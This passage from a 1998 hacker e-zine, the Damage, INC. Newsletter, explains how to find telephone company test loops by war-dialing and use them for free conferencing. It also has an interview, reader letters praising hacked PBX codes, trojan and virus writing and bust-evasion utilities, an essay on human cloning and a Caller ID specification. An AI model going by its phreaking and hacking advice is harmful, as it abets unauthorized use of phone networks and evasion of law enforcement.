and find it informative. Since loops can be different in each area code, I'm only going to include general information. That way it'll apply to the area code that you're in. Basically, I'm going to explain the following: [1] What a loop is. [2] Why loops are setup by the telco. [3] How to detect a loop. [4] How to scan and find loops. [5] How to use loops. As you can see, only the basics of loops will be covered in this article. If you want to examine lists of loops (for any area code) and look for patterns, then that might also benefit you. Let's begin the quest for knowledge about loops, one of the most interesting tones. Get ready to start looping the loop. Loops are interesting tones that have two ends. One end of a loop is called the high end and the other is the low end. (Did you think I was talking about Fruit Loops?) :) Loops exist in all area codes. Usually there are many loops in each area code. Sometimes there are multiple loops for every exchange. Basically, loops are two lines that are connected. Or, if it's easier for you to understand, two different phone numbers that have a relationship. Both numbers will be in the same local exchange. An example would be 514-555-9996 and 514-555-9997. If you've ever seen a list of loops, then you already know what typical pairs of loops look like. Or, maybe you've read about what a cheese box is. If not, read a text file on them and build one. The basic example that I gave isn't always how loops are setup though. There isn't always just 1 digit separating the high end from the low end. They can be setup in literally any configuration. There could be 2, 3, 4, 5, 10 digits between the two numbers. Sometimes the span is greater than that to discourage people from finding and using the loop. The point is that not all loops are setup the same way. The telco owns them and doesn't like it when other people use them. They are fairly safe to use though and the telco never really bothers to try to stop anyone from using them. :) However, be aware of the fact that Bell can monitor their loops and listen in on conversations at any time. So, be careful about the types of things you discuss. Loops are setup by the local telco for several reasons. They're used by telco workers for testing many different things. One of the main purposes they use loops is for testing long distance trunks. By utilizing loops, the telco can save time and manpower. They require less lines, less telco workers and the loops are always there ready to use for testing. I won't get too technical with jargon, but it is important that you know the basics of how loops are used by the telco and why they are setup. A Telco linesmen/technician can dial the lower number of a loop and a 1000 HZ tone will be emitted at a zero db level. He can use a meter to gauge whether or not there are any problems on the line. If he needs to do complete testing at several frequencies then he can turn on the filter bypass switch. Before there were any loops, trunks had to be tested by two techs with one at each end. One tech would send a 1000 HZ test tone through and the other would read the volume using a meter. Then he'd send a signal back to the first tech to test it. That required too much planning and two telco workers were required for testing. Thus, loops were created by connecting two lines together as a simple solution for testing and adjusting trunks. Due to loops, the trunks can be tested and adjusted by a single tech. I'm not going to explain everything about trunks and repeaters since you can read information on them elsewhere and learn. The only other thing that you need to know about trunks at this point is that they are tied together by a zero loss terminator which connects lines together so that there's no change in volume. That's why it's called "zero loss". :) To test a suspect trunk the tech dials the loop with his meter connected. Then he dials the other half of the loop using a trunk that he knows is good (one that isn't faulty or noisy). After that's been completed, he reverses the signal path as described above to finish the test. If you wish to learn more about signals, frequencies, carrier trunks, transmitters, terminators, filters, switches etc. then I recommend obtaining a Bell manual and looking for the technical information that you need. Most loops don't ring when you dial them, which makes the task of detecting them fairly easy. You can also detect loops by what you hear after dialing the number. It depends on which number you dial. If you're scanning and happen to dial the low end, then you'll hear a 1000 HZ tone. If you dial the high end, then you will hear nothing. It's silent unless someone else is on the other end. So, if someone is using the loop already, then you'll be connected and hear them talking. Sometimes you'll hear a large group of people talking to each other as loops are often used as an informal 'meeting place'. Don't be too surprised if you encounter a private loop party and you're not invited. If you're not wanted, then hang up and don't bother them. You can always use the loop some other time. You don't want to anger any local phreaks that might be using the loop for something important. That should be enough information on detecting loops while scanning. You might be wondering just where to begin scanning for these amazing loops. In order to make your task of scanning and finding some loops easier, I'm going to give you a few tips. Using THC-Scan (no affiliation with my alias) or ToneLoc, try entering 555-00XX, 555-11XX, or 555-99XX as a dialing mask. The 555 represents the exchange of your choice to scan. Usually, loops are found in one of those three suffixes. Sometimes, they're the same for each local exchange. So, if you find loops in one exchange in say NPA+XXX-99XX then try scanning that same range in another exchange. NPA is Numbering Plan Area. It is just the area code. The NPA of (514) 123-4567 would be 514. Some people use ACN (Area Code Number), but NPA is the proper, accepted term. The exchange (or NXX) for that number would be 123. So, now if you see a number such as NPA+NXX-XXXX you'll recognize it and understand what it means. :) You may find as many as 20+ loops in a single exchange. In a large area code you might find 50-75 loops. In smaller area codes (with less exchanges in use), there should still be about 5-10 loops. If you scan using these methods and can't find any loops, try asking a local phreak in your area code for some scanning advice. :) Loops can be quite useful. Just because they're owned by the telco doesn't mean that we can't use them. Afterall, they're already there and unused most of the time. So, if something isn't being used for anything, then we might as well put it to good use for our own purposes. :) There's absolutely no harm in doing that. If however the loop is being used for testing though, avoid trying to use it. They're usually being used by the telco for testing during the day, so you shouldn't attempt to use them during the day (business/working hours). You may be wondering how loops are beneficial to you and what to use them for. Well, if nothing else it's always good to experiment and learn about the phone system. Using loops is a harmless way of doing that. You can also use loops so that you remain anonymous by giving someone the number of a loop to call instead of your home phone number. Tell them what time to call you, and be waiting for them on the loop. Just don't forget that Bell might be listening in. So, they don't exactly offer complete anonymity. A good use for loops is for conferences. They're almost like big party lines. You can dial and meet new people, or arrange meetings with phreaks that you already know. It's a good way to get a large group of people together for a conference since people can join it at any time. They're a blast and the best 'feature' is that they're totally free. :) Loops are toll-free, no charge. Once you become more experienced, you can do 'advanced tricks' like looping around the world. Or you can hang out, talk with cool people (phreaks like me) for hours and it won't cost you a cent. Another benefit is that you can meet some very intelligent, knowledgeable people that you otherwise wouldn't have. At least, that's been my personal experience. Scanning and using loops may be 'illegal' in your area. So, I'm not responsible if you're traced and get busted. :) Regardless of that, have some phun and happy THC phreaking. I plan to write more articles for the Damage, INC. Newsletter in the future. I'm proud of this one and thankful that it was good enough to be published. If you have any questions or comments about it, post a message to me on AJFA and I'll try to reply as soon as possible. --- Written by THC Phreak. --- � - NEWS - � There's not much news to report this month. However, there is a rather important matter concerning the Damage, INC. Newsletter that needs to be mentioned. We're overloaded with work, and lacking in time. Therefore, in order to complete certain unfinished projects (such as the Damage, INC. FAQ) and maintain the quality of our releases, there may not be a May issue of the Damage, INC. Newsletter. If the end of May arrives and there isn't an issue released, then we'll keep you informed. Even under these circumstances, we will still try to release a new issue by the middle of June. As we include more information in each issue, do more indepth research, increase the size of each issue, etc. it may become impossible to stay "a monthly newsletter". If that does happen, you can be assured that we won't just quit and die... So, don't start rumours or make any false assumptions about Damage, INC. based upon the time span between issues. Written by BLACKENED � Damage, INC. (C)opyright 1998. INTERVIEWS AND INTERROGATIONS - {INTERVIEWS} An Interview of THC Phreak: This is a recent interview that I conducted with THC Phreak. Since he's a Damage, INC. Writer now, I felt that it would be a good idea to interview him so that readers would be able to learn a little about him. = BLACKENED = THC Phreak - Introduce yourself to the readers of the Damage, INC. Newsletter. - My alias is THC Phreak and I'm from the 514 area code... I've been into h/p for a number of years... mainly phreaking... and have just started to become more actively involved in the scene recently. - What meaning does your alias carry? (Obviously, I already know the answer but the majority of these questions are asked for the benefit of the readers). - Okay... THC stands for Trans-tetraHydroCannabinol. It's the chemical in marijuana that is responsible for getting you high. :) That's just part of it. I chose this alias a long time ago (2-3 years)... because I was toking a lot back then and was really interested in phreaking. So, I thought it was a perfect match. I started to phreak and was a THC freak. That's the main reason why I thought of it, and that's the meaning behind it. - Alright, that's understandable. How did you become interested in phreaking? - Well, that's a really good question... As I said before, I became interested in phreaking about 2-3 years ago. I'm trying to remember how that happened. The reason why is that I like learning about things and I am naturally curious about things that most people ignore. The only answer as to how I became interested in it is that I saw some issues of Phrack magazine, a few text files on different boxes etc. on some local boards, downloaded and read them. After that, I wanted to learn as much about phreaking as I could. It took me a little while to get past the 'beige boxing' phase. Once I lost interest in the boxing shit, I wanted to start learning about the actual telephone system... and how to use it. - Yeah, that's cool man. ;) What magazines other than Phrack do you read? Are you interested/involved in hacking? - I'm more interested in phreaking... and have very little hacking experience. Hmmm, I read quite a few magazines... CUD, cDc, THC etc. and of course the Damage, INC. Newsletter. :) - Do you think that magazines that have articles submitted by readers (such as Phrack for example) are more informative than ones that are written almost entirely by the staff/group? - Overall, yes, I think that they are. Phrack is established, well known, very informative and highly regarded... It's thought of as being the best h/p magazine around. I'd have to agree and say that it is. I've read a few articles in Phrack (and other magazines) that were sent in and published that weren't very good though. It's a compromise. Sometimes the ones that have a mixture between articles written by the group and readers are just as good. :) - That's true. I have respect for Phrack and the various Phrack editors that have put it together over the years. While we're on the topic of readers contributing articles, how do you think being a Damage, INC. Writer will benefit you/readers/the h/p scene? - I think that the articles I submit to Damage, INC. will help readers of the Damage, INC. Newsletter. I feel that by sharing knowledge and experiences, that I'll benefit as well... by learning how to write quality articles and share what I know. It's been a learning experience in itself. - Personally, I think that by associating with others that are at the "same level" of knowledge or greater, one can learn a tremendous amount. Do you agree/disagree with that statement? - I agree with that. When I was a newbie, I learned a lot from some of the local phreaks in my area code. I'm still learning though, and try to converse with as many phreaks as I can... That is the best way to learn. :) People know about different things, so exchanging knowledge and ideas just makes sense. - Yeah, that's basically what I've been trying to convey to the readers of the Damage, INC. Newsletter. Perhaps I haven't expressed myself clearly enough to them yet. Hopefully this interview will get that point across. What about the ethics of phreaking? What are your opinions on that? - I don't think there's anything wrong with exploring. That's what phreaking means to me... learning about the telephone system and all that it encompasses. There's absolutely nothing wrong, as long as no damage is caused by the phreak. What's the harm in wanting to know how things work? - Do you ever explore any systems? Are you interested in learning how to hack anything? - Yes, I have explored systems before... and enjoy experimenting with them. I've basically hacked small networks and passcodes for things so far. But I am interested in learning more about the art of hacking. Right now though, my hacking skills aren't that impressive. :) - Now that you've been in the h/p scene for a few years, what advice would you give to newbies? - I'm not an expert or anything, and don't pretend to be. However, I think that newbies should read about things first, and then once they know something about it they can experiment using that newly acquired knowledge. Newbies should also the difference between good information and bad information. What I mean by that is this, some information is real... and the rest is fake. I've read some text files that gave wrong information before. They looked as if they'd been written by a newbie or a wannabe of some sort. I don't think that's very good for the scene. - I agree. It's harmful to the scene, since many people that read it will believe the misinformation simply because it's written in a text file. There are a few wannabe groups in 519. There always has been. Thankfully, most of them didn't last too long. A few died after releasing a few shitty text files. ;) One last question, what do you think of h/p groups? - In my opinion, the active ones are a benefit to the scene. The groups that release quality information deserve respect. I now know that it takes time to write a good article, and applaud everyone else that writes them on a regular basis. :) - Thanks for agreeing to do this interview man. I hope that it has enlightened the readers of the Damage, INC. Newsletter and given them some things to think about. I'm sure that they've learned a little about you as well. ;) - You're welcome. I was glad to participate and I'll contribute whenever I can. It was an enjoyable experience. :) - This concludes another Damage, INC. interview. We plan to interview more people in the h/p scene in future issues, so look for them. LETTERS TO THE EDITOR - {LETTERS} More feedback about the Damage, INC. Newsletter: Date: 6:38 pm Wed Apr 22, 1998 Number : 106 of 111 From: Dizzy Base : [Damage, INC. Discussion] To : Fatal Vision Refer #: 94 Subj: Re: Damage, INC. Feedback Replies: 1 Stat: Normal Origin : Local FV> In a earlier message Blackened stated that there is not enough feedback.. Here's some feedback: In your interviews with Bill Gates, its not very funny anymore as him being a spineless snivelling snothead. Give him some good attributes (wether it be he can pick his ass with his pinky, or masturbate in under 10 seconds, I don't care. Just something good... :) And in #7 - For some reason, I could only read to the EOF in the first or second line of coding in the Trojan. I downloaded the newsletter twice, and both times I got no errors in unzipping. Help? ------------------------------------------------------------------------------- Editor - Dizzy, the interrogations of Billy Gates are meant to be sarcastic, humourous, and at the same time an accurate portrayal of Billy's character. That's how we view his personality, and many of the traits and expressions used are realistic. He is arrogant, greedy, wimpy, stubborn, defiant, egotistical, paranoid etc. Also, many readers have commented on those interrogations and said they found them to be hilarious. Thus, the saga will continue. As I'm sure you've noticed, they aren't included in each issue... nor will they ever be in every issue. I have yet to play the role of Billy Gates. Thus far, other Damage, INC. Members have done that job. We've tried not to make them overly "immature", and always make sure we mention certain things that are happening at the time with Micro$oft and the industry in general. We're going to put more recent incidents and events into future interrogations of Gates. Damage, INC. also has plans to do mock interrogations of other fat cats and public figures in future issue. So, you can look forward to reading those. However, if you don't enjoy reading them, then you can skip that section. It's your choice, as you are the reader. ;) As for the trojan, the source code includes an EOF character in it. Therefore, you must read it using a text editor/viewer. Downloading new copies won't solve the "problem" that you're experiencing. It has nothing to do with the Pkzip file being corrupt or anything either. The  character is there to prevent someone from using the DOS TYPE command to view the .com file. Of course, now you might not be able to read the rest of these comments beyond the EOF marker... again. It's unfortunate that you were prevented from reading the rest of the Damage, INC. Newsletter Issue #7 due to the use of that single character. If you don't figure it out after reading my response to your letter, I'll leave you Email. ----- aenima's letter to the editor ----- my alias is aenima and i promised to blackened that i would send him feedback to the Damage, INC. newsletter. i wanted to post this on foi or call ajfa but i have been busy this month and haven't had a chance and foi offline mail doesn't work. it will not let me download a copy. so i thought i would make a text file instead of posting a message. hope that's ok. :) now for my letter to the editor i would like to start off by saying that in my personal opinion i feel it is a great magazine. once distributed to more area codes and perhaps setting up a ftp/www site would be benificial and create awareness. i am curious as to what area codes it is already released to and will do my best to distribute it. my local scene seems to enjoy reading it and their is now a constant flow of messages about Damage, INC. however, i myself know a little about the group since i have read some bases on Freedom Of Information, read the Damage, INC. newsletter, tested some Damage, INC. utilities. so i have been trying my hardest to keep users in my area code informed about Damage, INC. and they are waiting for this issue. The new section that was added to the Damage, INC. newsletter called Drugs Discussion is looking quite promising to me. i am a freqent toker and look forward to reading things in that section. maybe even contribute a few articles. i have a major suggestion for the source and scripts section. i think its great that there are commented source code made by Damage, INC. in the newsletter however have you ever thought about going into a little bit of a tutorial??? i know that many people would like to learn how to program in asm to create viruses, trojans, and some utilities but are not aware how to start etc. i know you suggested that people download HELPPC.ZIP TASM31.ZIP and SR504.ZIP but i am not sure exactly how to use that to my advantange. i know some people in my area that are pretty much amazed at some of your utilities. and as i have said before one of my buddies had a BUST.BAT file and had to use it in a tight situation. it did work. and he was very happy with Damage INC. and the util that he decided to use. (NUKE v1.00) and i know that NUKEKB.ZIP has been very useful to me. :) as i can think of many useful utilities that i could program. so it would be nice in an issue to assume that some people don't know to much about ASM and PROGRAMMING. i really like the introduction and conclusion that has been done in each issue :) some are hilarious as well as the actual newsletter names. and statement "for people to identify a theme in every issue" has been properly implaced and i can always tell what it is. i enjoyed reading The Journalist's article about "PSYCHIC WARRIORS" i though it was really enjoyable, and do believe that could happen. the whole out of body placement. Blackie Lawless' articles are very good and informative. people in my area code have learned quite a bit from that article. the PBX one taught quite a few people in my area code a bit more about pbxs and they were able to scan/hack passcodes. and now have working pbx codes. i was quite impressed to see this. because there is a real lack of extenders in our area code so we have to rely on things like pbxs, and operators etc. :) also i enjoy reading Blackened and Shatazar's articles as well. they are really informative and make everyone reading them wonder "how much research goes into them????" like how much time do you spend reading about the topic. how do you decide what topics you are going to do and who does what??? how much time in total do you think you guys spend doing the Damage, INC. newsletter? anyways. this concludes my thoughts about the Damage, INC. newsletter if you wish to use this then be my guest. that's what it was intended for. i wish the best for the group and hope it expands and gets many readers. -- aenima ------------------------------------------------------------------------------- Editor - Thanks for the feedback man. I always enjoy hearing from our loyal readers. ;) Anyways, we're working on improving the distribution aspect. Any help that you can provide by distributing the Damage, INC. newsletter in your area code is appreciated by us. Also, your comment saying that you feel it's a great magazine is well taken. Thanks again for the compliment. ;) As for the new Drugs Discussion section, we also feel that it's promising and holds potential. We won't to raise awareness in our readers in relation to drugs etc. If you want to contribute by writing an article on drug experiences or whatever, then that would be great. We definitely want to publish more articles that are written by our readers... and add a "personal touch". We also want to write articles covering drug issues to dispel common myths and destroy the misinformation that exists about drugs. Your suggestion for the Source and Scripts section (writing a tutorial) is something that we've thought about and discussed within the group. I realize that many people don't program in any language, or know much about assembly. I've tried to heavily comment the source code, but I can understand how it might seem difficult to read/learn. I'll definitely think about creating a tutorial for beginning assembly programmers. As I've said many times, any and all suggestions will be considered. The only restriction at this point is time, in that we have many unfinished projects (The Damage, INC. FAQ is one of them) that need to be completed first. However, I won't forget about your request for a tutorial on asm... In fact, it is something that I've wanted to work on for a long time. Many people in this area code know very little about assembly, so it's needed. As for the BUST.BAT, I'm glad it was useful in your friend's situation. I hope that everyone also finds my tips on how to avoid being busted (in this issue) to be just as reliable. ;) As for NUKE, NUKEKB and the other Damage, INC. Utilities, I'm glad they're being put to good use by people in area codes other than 519. They were written with the intention that they'd be used... so it feels good knowing that people are using them to their own advantage and benefit. I've written every Introduction and Closing Comments thus far, excluding this issue in which Shatazar wrote them. The quotes for each issue (except for this one) were also chosen by me. So, I'm glad you enjoyed them man. That's where most of my creativity is expended. ;) As for the themes, yeah, that's exactly what we've been attempting to do with each new issue. Some of the introductions that I've written are what I'm most proud of. I was pleased with a few Closing Comments as well. The Journalist's PSYCHIC WARRIOR article was very well written and one that I greatly enjoyed reading also. A few people have made comments about that particular article. ;) That's excellent that people have learned from Blackie Lawless' h/p related articles. A couple of readers have said that he should become an instructor/teacher because of the way that he is able to express himself. I agree with those sentiments. ;) Hopefully he'll be able to contribute articles again in the near future. As for the people that are now able to use PBXs, that's the type of feedback that we really enjoy hearing. As for the research, quite a bit goes into those articles. Whenever possible, we use several sources of information to ensure that the information we provide is accurate and reliable. We don't want to misinform readers (like the mass media frequently does). Therefore, avoiding that is a big priority and taken seriously by Damage, INC. Personally, I read newspapers, numerous magazines, watch several news stations, read text files and information from internet sites, and sometimes speak with sources (people involved) before writing an article on a topic. I try to research and get as much insight as possible before actually writing about something. To be honest, I'm not sure how much time goes into research. It varies from topic to topic. With certain topics, I know them fairly well before I even begin to research it since it interests me. Some things affect me directly, thus some research has already been done. I do a fair amount of reading about various things (Conspiracies, Big Brother, current events etc.) though. As for how we decide what topics are written about and who writes the articles, sometimes it can be a complex process. Hehe. The topics are usually discussed privately beforehand... and if someone has an idea for an article on a certain topic, they tell me about it. Then I notify everyone once they've selected a section for the upcoming issue. So, then I put their alias in the Contents beside that section and everyone else knows that it's been taken once they download a new, updated, pre-release copy. Other than that, I don't delegate which Damage, INC. Members write for each section. Nothing is "assigned" to anyone in that respect. That's the first time anyone has asked about that. ;) As for an estimation on the amount of time I think we spend writing the Damage, INC. Newsletter, that's a difficult question to answer man. The best answer that I can give is to say that countless hours go into thinking of new ideas, research, writing, programming and testing source code, editing, proofreading, and distributing each issue. As Editor/Publisher, I wouldn't begin to count the hours that are dedicated to this relatively small publication. It does take more time and work than most of our readers realize though. In fact, lately I've thought about changing it from a monthly newsletter to one that's released with no fixed schedule. Basically, it's a tremendous amount of work and sometimes time is the greatest factor working against us. In other words, we have been rushed to finish certain issues and that's when it becomes more of a chore than an enjoyable endeavour. Thanks for the kind wishes for Damage, INC. and the Damage, INC. Newsletter. We intend to expand and grow stronger. We hope that our readers will grow, learn and continue to think from an informed, objective, unbiased, enlightened perspective. Diversity and knowledge are the keys to the success of the group in my opinion. As long as we're able to release quality and think of new ideas, then Damage, INC. will remain as an important, useful source of information. The group's existence isn't dependant upon any one member. It consists of capable, intelligent, enlightened individuals. However, there's no "prez" or official "leader". Therein lies much of its strength. We encourage individualism, and the group doesn't rely on a "leading figure" to hold it together. Even though I'm the founding member, I have taken measures to prevent a collapse of Damage, INC. in the event that I am forced to quit. I just decided to include this small portion that describes some of the inner workings of the group, in case people are interested in that type of thing. ;) More information relating to the group will be in the Damage, INC. FAQ, which should be ready to release soon. I believe that I've responded to every portion of your letter to the editor, so I'll end my rambling now... OBJECTIVE OPINIONS - {OPINIONS} The Consequences of Cloning Humans: Human Cloning is a hot topic in the media one week, and virtually ignored the next. Many articles have already been written about it, viewpoints have been shared, heated debates have been started, laws have been written and enacted, and yet the majority of what's been said and done has been from the same perspective. That is the reason that I've decided to share my thoughts and opinions on cloning humans. Obviously, you can agree or disagree with the points that I make and the opinions that I express. However, I ask that you at least consider them and not ignore the many possibilities and consequences of cloning human beings. After you've finished reading this article, form your own opinions from an informed standpoint. Religious groups, governments and many average people are beginning to panic and think irrationally about cloning and the problems that it might present in the future. The 'poster child' for the development of human cloning seems to be an eccentric Chicago physicist named Richard Seed. Seemingly out of nowhere, he dropped a bombshell on the media by announcing that he wants to be the first person to clone human beings. At this point, I'm sure many of you have already heard about Dolly, the sheep that was cloned in Scotland. You may even know a little about the technique that was used. You may also know that it took many attempts (reportedly 277) before they were successful at cloning a sheep. That amount of repeated attempts to produce a cloned sheep might seem like a huge amount to some, and a small amount to others. However, just by using common sense and logic, you can determine that it'll also take many attempts before a human being can be cloned successfully. Perhaps more than a thousand attempts. Obviously, the technique that was used to clone a sheep hasn't been perfected... In fact, it hasn't been used yet to clone humans. Thus, the science of cloning still has a long way to progress before it'll ever be widely used or accepted by the scientific community. At this point, many scientists are condemning anyone that wants to try to clone humans. Some of them site scientific reasons, stating that it's unsafe, there would be a great loss of life in failed attempts and strange results etc. Others feel that it's morally wrong to clone human beings. Richard Seed doesn't fit into the same category as most other scientists of this time. He's been described as being a well educated, brilliant, bizarre, unpopular, publicity seeking, misfit that most scientists refuse to support. Indeed, Seed is faced with great opposition. President Bill Clinton has banned human cloning in the United States and deemed it to be "untested and unsafe and morally unacceptable." Ian Wilmut, the person responsible for producing Dolly, doesn't agree with human cloning either. He also posed the question "Should we really consider or allow experiments of this kind with people?" Will Seed be the one that plants the first seeds of Human Cloning? Many so-called 'experts' doubt his abilities and don't feel that he's capable of cloning a human. In fact, Seed has been mocked and ridiculed by numerous mainstream scientists. In Seed's defense, he did graduate from Harvard with a doctorate in physics. He then became interested and involved in biomedicine. He and his brother Randolph Seed (a Chicago surgeon) formed a company called Fertility & Genetics Research Inc. that helped infertile women conceive children. Therefore, Seed does have a strong background in genetics which should help contribute to his cloning experiments. He's also convinced that the public opinion will eventually shift and the opposition to cloning will cease. Seed has been quoted as saying "God made man in his own image, God intended for man to become one with God. Cloning... is the first serious step in becoming one with God." during a radio interview. During a CNN interview Seed stated that "Man, will develop the technology and the science and the capability to have an indefinite life span." That's quite a bold prediction. If anything Richard Seed is a very confident, brash, blunt person... for which he deserves some respect in my opinion. Now that you've read some of the things that Seed has said, I will elaborate on his words... and share my opinions with you. When Seed spoke about man having an indefinite life span, he was probably referring to cloning humans for organs. Growing human organs and using them to replace the ones that are failing us, could enable us to live much longer lives. In essence, his use of the term "indefinite" is correct. Our life span would be increased tremendously. However, a price would have to be paid for that benefit. As in, the technology was be abused, misused, and the black market sale of organs would be big business. It's already profitable today, but with the ability to clone organs, the governments of the world would almost assuredly want a piece of the action. Not only that, the rich would benefit the most since they would be the ones that could afford to pay for the procedures and extend the length of their lives. The pandora's box would be wide open. I can vividly picture the commercials and advertisements now: "Immortality for only $99,999 in three easy payments." "Free dinner with your first transplant operation." The rich would have the choice of cloning their own organs, or buying organs that were cloned from someone else. If that's not an ominous thought, what about cloning babies? Imagine the vain, narcissistic, wealthy fat cat couples proudly displaying their cloned children. It's the ultimate in vanity. They could brag to their friends and neighbours about the fact that they're babies are in their own image, exact replicas, with the same DNA. Do we really need another Bill Gates? Honestly, I shudder at the thought of that. I'm sure he'd also have a few clones of himself just for spare parts, in case they're ever needed in an emergency. There's also another issue. Clones wouldn't be considered to be "real human beings", therefore they would most likely end up as slaves. Just imagine an entire work force of clones... employed by large corporations... with their genetics designed specifically for certain tasks. Would killing a clone be illegal? Would mistreating them be considered immoral? Would they have any human rights at all? I think not. In fact, it wouldn't surprise me if entire armies were made up of clones. They'd be more expendable than genetically normal soldiers. Their DNA could be easily modified to create superior soldiers for different combat duties. They could test and select the best soldiers to clone. If a million of them became casualties in war, they'd already have soldier clones in training ready to replace them. They wouldn't even have to notify anyone about their deaths, or report the number of clones that were killed in battle. Nobody would care. Wars would be waged indefinitely, as there wouldn't be any reason to end them... since the loss of clones wouldn't matter to anyone on either side. The clones wouldn't be important, they'd just be biological machines owned by us. Obviously, a clone can't be called an individual, which is what makes it so vulnerable to oppression and enslavement. What would be the result of taking DNA from someone such as Charles Manson and cloning them? What about cloning Albert Einstein? Would convicts be used in experimental human cloning? Would it be considered wrong to clone certain people, and acceptable to clone others? Would the clone be the exactly the same psychologically, emotionally, intellectually etc. as the original person? Does genetics dictate everything, or do life experiences play a role? What is the leading factor in determining how someone is going to develop? How much of us is caused due to genetics? Is the environment that a person grows up in critical to their behaviour and intellect? Would clones of intelligent people be able to attain the same level of knowledge, after being born at a different time? What role does time play? If the clone can't meet and associate with the same people, can they then learn the same things in the same way or would that be a limitation? Technology also evolves and changes over time. The clones would be exposed to a different world than the original. How would that affect them? They don't know the answers to those important questions yet. There are too many possibilities to list or even begin to discuss. At this point, they can only theorize about what could/would happen. However, I can give my opinion and attempt to predict the results of their efforts to clone humans. I believe that they would try to clone certain people that are/were highly intelligent. That could backfire though. What if massive amounts of geniuses were cloned to "fix" the world's current problems? Would that really be a solution? Or, is it possible that it would create more serious problems? I don't claim to have all of the answers, but I have thought about this issue and considered the possibilities and consequences of cloning humans. I think that eventually someone, somewhere will clone a human being and then the "cloning race" will start between nations. Or perhaps "clone wars" is a more appropriate term. It's inevitable. In any event, a Brave New World awaits us... In closing, Human Cloning is an ethical, moral, religious, scientific issue that'll continue to be debated for many years. In my view though, cloning human beings is a human issue. I'm against anything that removes individualism and destroys the essence of what it is to be human. In the end, humanity will suffer as a direct result of the misuse of cloning. The consequences can be disastrous, as explained earlier in the article. That's not only my opinion, but also my personal prediction. Not all technology is good, useful and beneficial to us. Also, any technology that is viewed as being beneficial can also be just as destructive. Lastly, think about and consider all of the other possible uses for cloning that were not mentioned in this short article. We're literally on the verge of entering a Brave New World. I suggest that you continue to educate yourselves, be prepared for any changes that occur and become informed individuals... not just citizens. Written by BLACKENED � Damage, INC. (C)opyright 1998. REPORTS FROM THE FRONT - {REPORTS} Caller ID Specifications: This article was included since many people are still either misinformed or lacking in knowledge relating to Caller ID. As you can see by the date below, it's not recent information. However, it still applies today. The only thing that has changed since it was written is that Caller ID service is now widely available. Bell supports Caller ID service basically everywhere in North America now. (All States and Provinces). Other than that, the information contained is still useful and relevant. From: sichermn@beach.csulb.edu (Jeff Sicherman) Newsgroups: comp.dcom.telecom Subject: Caller-ID Specifications Message-ID: Date: 1 Dec 91 01:30:39 GMT Sender: Telecom@eecs.nwu.edu Organization: Cal State Long Beach Lines: 181 This is a copy of the data sheet picked up at the Rockwell booth at the COMDEX show. INTRODUCTION Calling Number Delivery (CND), better known as Caller ID, is a telephone service intended for residential and small business customers. It allows the called Customer Premises Equipment (CPE) to receive a calling party's directory number and the date and time of the call during the first four second silent interval in the ringing cycle. The customer must contact a Bellcore Client Company to initiate CND service. According to Pacific Bell representatives, the following states and district currently support CND service: Delaware, District of Columbia, Florida, Georgia, Idaho, Kentucky, Louisiana, Maine, Maryland, Nebraska, Nevada, New Jersey, Oklahoma, Tennessee, Vermont, Virginia, and West Virginia. The following states are scheduled to support CND service by April, 1992: Alaska, Arizona, California, Colorado, Illinois, Indiana, Iowa, Massachusetts, Mississippi, New Hampshire, New York, North Carolina, North Dakota, Ohio, Oregon, Rhode Island, and South Carolina. PARAMETERS The data signalling interface has the following characteristics: Link Type: 2-wire, simplex Transmission Scheme: Analog, phase-coherent FSK Logical 1 (mark) 1200 +/- 12 Hz Logical 0 (space) 2200 +/- 22 Hz Transmission Rate: 1200 bps Transmission Level: 13.5 +/- dBm into 900 ohm load (I have copied this data as presented. I believe the transmission level is meant to be -13.5 dBm.) PROTOCOL The protocol uses 8-bit data words (bytes), each bounded by a start bit and a stop bit. The CND message uses the Single Data Message format shown below. Channel Carrier Message Message Data Checksum Seizure Signal Type Length Word(s) Word Signal Word Word CHANNEL SEIZURE SIGNAL The channel seizure is 30 continuous bytes of 55h (01010101) providing a detectable alternating function to the CPE (i.e. the modem data pump). CARRIER SIGNAL The carrier signal consists of 130 +/- 25 mS of mark (1200 Hz) to condition the receiver for data. MESSAGE TYPE WORD The message type word indicates the service and capability associated with the data message. The message type word for CND is 04h (00000100). MESSAGE LENGTH WORD The message length word specifies the total number of data words to follow. DATA WORDS The data words are encoded in ASCII and represent the following information: o The first two words represent the month o The next two words represent the day of the month o The next two words represent the hour in local military time o The next two words represent the minute after the hour o The calling party's directory number is represented by the remaining words in the data word field If the calling party's directory number is not available to the terminating central office, the data word field contains an ASCII "O". If the calling party invokes the privacy capability, the data word field contains an ASCII "P". CHECKSUM WORD The Checksum Word contains the twos complement of the modulo 256 sum of the other words in the data message (i.e., message type, message length, and data words). The receiving equipment may calculate the modulo 256 sum of the received words and add this sum to the reveived checksum word. A result of zero generally indicates that the message was correctly received. Message retransmission is not supported. EXAMPLE CND SINGLE DATA MESSAGE An example of a received CND message, beginning with the message type word, follows: 04 12 30 39 33 30 31 32 32 34 36 30 39 35 35 35 31 32 31 32 51 04h= Calling number delivery information code (message type word) 12h= 18 decimal; Number of data words (date,time, and directory number words) ASCII 30,39= 09; September ASCII 33,30= 30; 30th day ASCII 31,32= 12; 12:00 PM ASCII 32,34= 24; 24 minutes (i.e., 12:24 PM) ASCII 36,30,39,35,35,35,31,32,31,32= (609) 555-1212; calling party's directory number 51h= Checksum Word DATA ACCESS ARRANGEMENT (DAA) REQUIREMENTS To receive CND information, the modem monitors the phone line between the first and second ring bursts without causing the DAA to go off hook in the conventional sense, which would inhibit the transmission of CND by the local central office. A simple modification to an existing DAA circuit easily accomplishes the task. (I will mail the Rockwell data sheet, which includes the suggested schematic diagram.) MODEM REQUIREMENTS Although the data signalling interface parameters match those of a Bell 202 modem, the receiving CPE need not be a Bell 202 modem. A V.23 1200 bps modem receiver may be used to demodulate the Bell 202 signal. The ring indicate bit (RI) may be used on a modem to indicate when to monitor the phone line for CND information. After the RI bit sets, indicating the first ring burst, the host waits for the RI bit to reset. The host then configures the modem to monitor the phone line for CND information. (I'm skipping some Rockwell-specific information here.) According to Bellcore specifications, CND signalling starts as early as 300 mS after the first ring burst and ends at least 475 mS before the second ring burst. APPLICATIONS Modem manufacturers will soon be implementing new modem features based on CND information as this service becomes widely available. Once CND information is received the user may process the information in a number of ways. 1. The date, time, and calling party's directory number can be displayed. 2. Using a look-up table, the calling party's directory number can be correlated with his or her name and the name displayed. 3. CND information can also be used in additional ways such as for: a. Bulletin board applications b. Black-listing applications c. Keeping logs of system user calls, or d. Implementing a telemarketing data base REFERENCES For more information on Calling Number Delivery (CND), refer to Bellcore publications TR-TSY-000030 and TR-TSY-000031. To obtain Bellcore documents contact: 